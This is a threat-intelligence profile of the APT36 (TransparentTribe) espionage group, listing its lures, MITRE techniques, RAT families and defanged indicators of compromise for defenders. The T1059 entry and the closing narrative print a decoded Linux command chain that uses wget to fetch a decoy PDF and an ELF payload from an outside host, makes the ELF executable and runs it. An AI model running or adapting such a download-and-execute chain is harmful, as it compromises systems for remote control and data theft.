Threat Actor Profile: TransparentTribe

TransparentTribe (aka APT36) conducts targeted cyber-espionage against Indian government, military, and related sectors using phishing, malvertising, and social-engineering lures to deliver RATs across Windows, Linux, and Android. Their campaigns leverage typo-squatted .in domains, Google Drive hosting, and known exploits (CVE-2012-0158, CVE-2010-3333) to deploy tools such as Crimson RAT and ObliqueRAT. #TransparentTribe #CrimsonRAT

Keypoints

TransparentTribe (APT36) operates from Pakistan and primarily targets Indian government, military, diplomatic, and education sectors.
Initial access vectors include spear-phishing with malicious Office/PowerPoint macros, malvertising (Google Ads promoting fake Kavach download portals), and romance/social-engineering lures delivering malicious APKs.
They host payloads on typo-squatted .in domains, Google Drive, and infrastructure tied to IPs such as 5.189.145[.]248 and 153.92.220[.]59; Linux desktop entry files and obfuscated ELF binaries have been used for Linux targets.
Exploited vulnerabilities include CVE-2012-0158 and CVE-2010-3333 to drop final payloads; intermediate stages often execute scripting interpreters and deobfuscation routines before running RATs.
Final payloads are a mix of custom and publicly available RATs—Crimson RAT, ObliqueRAT, Peppy, njRAT, CapraRAT, Android RATs, USBWorm, LimePad, etc.—with capabilities for command execution, file exfiltration, persistence, and credential theft.
Persistence techniques observed include scheduled tasks, registry/startup modifications, and other standard run keys; exfiltration commonly occurs over C2 channels and encrypted transfers.

MITRE Techniques

[T1193] Phishing – Used to gain initial access via tailored emails and malicious documents (‘phishing emails containing malicious documents, including Microsoft Word and PowerPoint files’).
[T1583.001] Acquire Infrastructure: Domains – Registration and use of typo-squatted .in domains and newly registered sites to host malicious installers (‘registered multiple domains on a server with the IP address 153.92.220[.]59’).
[T1190] Exploit Public-Facing Application – Exploited known Office/MSCOMCTL vulnerabilities to deliver payloads (‘created malicious files to exploit the CVE-2012-0158 and CVE-2010-3333 vulnerabilities to deliver the final payload’).
[T1059] Command and Scripting Interpreter – Execution of obfuscated shell/wget commands and scripts to download and run binaries (‘/usr/bin/wget …; cd /tmp; chmod +x 185.elf; libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185’).
[T1547.001] Registry Run Keys / Startup Folder – Use of registry and startup entries to maintain persistence on Windows systems (‘may add malicious entries to the Windows registry or startup folders to achieve persistence’).
[T1027] Obfuscated Files or Information – Use of obfuscated desktop entry files and payloads to evade detection (‘malicious desktop entry files contain obfuscated commands to download and execute malicious elf files’).
[T1140] Deobfuscate/Decode Files or Information – Payloads include decode/deobfuscation steps prior to execution (‘may use techniques to decode or deobfuscate their malicious payloads to bypass detection’).
[T1003] Credential Dumping – Theft of stored credentials on compromised hosts to support lateral movement (‘may attempt to steal credentials stored on compromised systems using tools such as Mimikatz’).
[T1041] Exfiltration Over Command and Control Channel – Stolen data exfiltrated via C2 infrastructure and HTTP POST requests (‘may exfiltrate stolen data over their command and control infrastructure’ and ‘Exfiltration of files is conducted through HTTP POST requests’).

Indicators of Compromise

[IP Address] C2/hosting infrastructure – 5.189.145[.]248 (used to send phishing emails and associated with BreachRAT/DarkComet/njRAT), 153.92.220[.]59 (domains registered and used to host Linux desktop entry files).
[Download URL/Host] Malicious file hosting – hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf, hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185 (used in Linux desktop-entry download chain).
[File names] Dropped payloads – /tmp/Delegation_Saudi_Arabia.pdf (decoy), /tmp/185.elf (malicious ELF payload) and other staged binaries.
[Domains/TLDs] Lures and infrastructure – Typo-squatted .in domains and Google Drive links used to host malicious installers (examples: Kavach-related fake portals promoted via Google Ads and other .in domains, and Google Drive links for malware hosting).
[Malware/Tools] Notable payloads observed – Crimson RAT, ObliqueRAT, CapraRAT, njRAT, USBWorm, and various Android RATs (and multiple other RATs listed in the report).

TransparentTribe conducts multistage intrusions that begin with tailored lures: spear-phishing emails with malicious Office or PowerPoint macros, malvertising (paid Google Ads pointing to attacker-registered Kavach-like sites), and romance/social-engineering links that deliver APKs. For Windows targets macros drop and execute Remote Access Trojans; for Linux targets phishing websites serve malicious .desktop files that run obfuscated wget/chmod/exec sequences to fetch ELF payloads; for Android the actors distribute APKs that request extensive permissions to enable RAT functions.

Exploitation and staging include the reuse of known Microsoft vulnerabilities (CVE-2012-0158, CVE-2010-3333) in crafted documents, obfuscation and deobfuscation routines, and scripted execution via system interpreters. A representative decoded Linux command chain observed was: “/usr/bin/wget ‘hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf’ -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget ‘hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185’ -O /tmp/185.elf; cd /tmp; chmod +x 185.elf; libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185”, which downloads a decoy PDF and an ELF, makes the ELF executable, and pipes the decoy into the ELF to trigger execution.

Post-compromise activity centers on persistence (scheduled tasks, startup/registry run keys), credential harvesting and lateral movement, and exfiltration over C2 channels. The group deploys a mix of custom and commodity RATs—Crimson RAT, ObliqueRAT, Peppy, njRAT, CapraRAT, various Android RATs, USBWorm, LimePad—each providing remote command execution, file discovery/exfiltration, keylogging, and C2 communication often tied to IPs like 5.189.145[.]248 and hosting infrastructure on 153.92.220[.]59; defenders should watch those IOCs, malicious .in domains, Google Drive hosting, and the described download/exec command sequences.